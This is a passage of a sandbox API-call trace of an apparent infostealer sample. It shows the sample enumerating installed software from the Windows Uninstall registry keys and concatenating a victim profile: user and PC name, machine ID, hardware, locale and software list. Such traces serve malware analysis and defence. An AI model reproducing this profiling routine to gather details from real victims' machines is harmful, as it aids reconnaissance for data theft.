Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\n", lpString2="Office 16 Click-to-Run Extensibility Component" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component" [0208.110] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x1, lpData="16.0.4266.1003", lpcbData=0x19ce18*=0xf) returned 0x0 [0208.111] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component " [0208.111] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component ", lpString2="16.0.4266.1003" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003" [0208.111] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\n" [0208.111] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.111] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0x1d, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-008C-0409-0000-0000000FF1CE}", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.111] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{90160000-008C-0409-0000-0000000FF1CE}") returned 94 [0208.111] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{90160000-008C-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.111] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x1, lpData="Office 16 Click-to-Run Localization Component", lpcbData=0x19ce18*=0x2e) returned 0x0 [0208.111] lstrlenA (lpString="Office 16 Click-to-Run Localization Component") returned 45 [0208.111] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\n", lpString2="Office 16 Click-to-Run Localization Component" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component" [0208.111] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x1, lpData="16.0.4266.1003", lpcbData=0x19ce18*=0xf) returned 0x0 [0208.111] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 